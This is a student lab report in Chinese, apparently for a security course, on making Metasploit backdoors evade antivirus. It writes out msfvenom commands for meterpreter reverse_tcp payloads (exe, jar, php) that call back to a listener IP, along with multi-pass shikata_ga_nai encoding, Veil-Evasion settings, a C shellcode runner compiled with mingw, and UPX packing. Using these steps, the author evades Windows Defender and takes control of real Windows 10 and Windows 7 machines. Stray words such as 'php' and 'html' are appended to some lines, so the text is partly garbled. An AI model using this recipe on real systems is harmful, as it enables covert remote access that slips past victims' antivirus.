1.1 正確使用msf編碼器(0.5分),msfvenom生成如jar之類的其餘文件(0.5分),veil-evasion(0.5分),加殼工具(0.5分),使用shellcode編程(1分)
1.2 經過組合應用各類技術實現惡意代碼免殺(0.5分)
(若是成功實現了免殺的,簡單語言描述原理,不要截圖。與殺軟共生的結果驗證要截圖。)
1.3 用另外一電腦實測,在殺軟開啓的狀況下,可運行並回連成功,註明電腦的殺軟名稱與版本(加分0.5)
2.php
(1)殺軟是如何檢測出惡意代碼的?
檢測特徵碼、啓發式惡意軟件檢查和行爲。
(2)免殺是作什麼?
經過一些手段假裝使惡意代碼免遭殺軟查殺。
(3)免殺的基本方法有哪些?
有msfvenom編碼、使用veil-evasion等重寫惡意代碼、利用shellcode生成可執行文件、加殼等方法或者更高級的特徵碼修改包括文件特徵碼修改和內存特徵碼修改。html
使用命令生成後門程序
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.70.131 LPORT=5231 -f exe > wyhy.exe
將生成的程序上傳到virus total
檢測
上傳virscan
檢測
使用msf編碼器對後門程序編碼10次
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.70.131 LPORT=5231 -f exe > wyhy-10.exe
而後再傳到virus total
上檢測
上傳virscan
檢測
java
使用命令生成.jar包
msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.70.131 lport=5231 x> 5231_backdoor.jar
linux
上傳virscan
檢測
shell
使用命令生成php文件
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.70.131 LPORT=5231 x> 5231_backdoor.php
上傳virscan
檢測
(竟然只有一個檢測出來了,是誰呢?)
(卡巴斯基,牛皮!烏拉!!!(破音!))編程
安裝這個veil真的是,遇到提示別選Y手動安裝,直接s(silent)
靜默安裝,系統決定,一切隨緣,手動安裝的下場就是這樣( ⬜ ⬜ ⬜? ⬜ ⬜。 ⬜ ⬜ ⬜!)
若是安裝失敗的,能夠去usr/share/veil/config
下運行setup.sh
從新安裝
最後安裝成功的輸入veil
會有以下界面,而後輸入use evasion
進入evil-evasion
輸入命令use c/meterpreter/rev_tcp.py
進入配置界面
windows
set LHOST 192.168.70.131
set LPORT 5231
options數組
輸入generate
生成文件,接着輸入你想要playload的名字
而後文件保存在/var/lib/veil/output/compiled/
下,將生成文件提交掃描
安全
先執行shellcode生成命令獲得shellcode
而後建立個.c文件將shellcode代碼注入tcp
「shellcode」
int main()
{
int (func)() = (int()())buf;
func();
}
執行i686-w64-mingw32-g++ 20165231.c -o 20165231.exe
生成可執行的後門程序
而後上傳測一下
而後拖到主機上測試,被檢測出禁止運行而且Windows defender自動清理掉了(個人電腦早在三年前就卸載了360,電腦管家之類的,三年來的苟活憑藉的就是一身正氣加上微軟自帶的Windows Defender,我以爲那些東西不會讓我電腦比這個更安全只會讓它更卡!!!)
使用c+shellcode+加壓縮殼
實驗環境:被控機是win10實體機,沒有360和騰訊電腦管家,微軟自帶Windows defender防火牆殺毒全開。
原理:將shellcode替換到以上代碼的數組後給編譯生成的EXE文件加殼中達到免殺效果
使用壓縮殼(UPX)upx 20165231.exe -o wyhy5231.exe
而後放到主機測試
放着不動或者用殺毒工具掃描就沒有報警,一旦運行直接警告,而且直接被刪
好的我錯了,我覺得就這麼經過了沒幾分鐘它就不見了!!!???系統又悄悄啓動掃描一遍而後偷偷把文件給刪了,而後再次放進主機共享文件夾就有危險報警了
爲了完成反彈回連給他白名單吧,可是………………
好吧只有整個文件夾給設置爲白名單吧(其實並沒啥用,仍是會被刪,而後去威脅詳細表裏面手動恢復)
最後按照上次實驗的步驟,我仍是控制了個人win10主機,而且拍了個照,Windows defender也沒有再幹預。
免殺方法:先用msfvenom生成shellcode,再使用壓縮殼進行加殼。
實驗環境:對方電腦爲 win7實體機,360 11.5.0.2002
本機打開msf控制檯,開始監聽,受控機運行後門程序
不能,這次簡單的實驗都逃過一劫(雖然有些地方暫時啓用了白名單),高手總會想辦法模擬一些正常軟件的特徵而後不斷加殼加密或者更加高級的手段逃過殺軟的查殺。
一、安裝veil-evasion過程當中出現不少彈窗提示你安裝,可是裏面的字卻又是方框,編碼錯誤顯示不出來。
解決:在安裝之除就選擇s
靜默安裝,一切由系統本身設置安排。
二、虛擬機ping不通別的實體機
解決:把虛擬機網卡設置改成橋接模式就能夠了
本次實驗很長,很很差作,特別是veil,安裝時間長,出錯排查困難。通過此次實驗我也認識到殺軟也不是萬能的,總會有病毒庫裏沒出現過的新鮮玩意逃過一劫。想要電腦的安全就要作到本身不主動瀏覽不安全網站,不去下載不明軟件,再加上殺軟的一些防火牆功能,對於咱們普通人來講仍是很安全的。其次身邊同窗的實驗也讓我感覺到360 和安全管家真是愈來愈** 了,好好一臺電腦裝了這玩意兒就卡卡卡死了!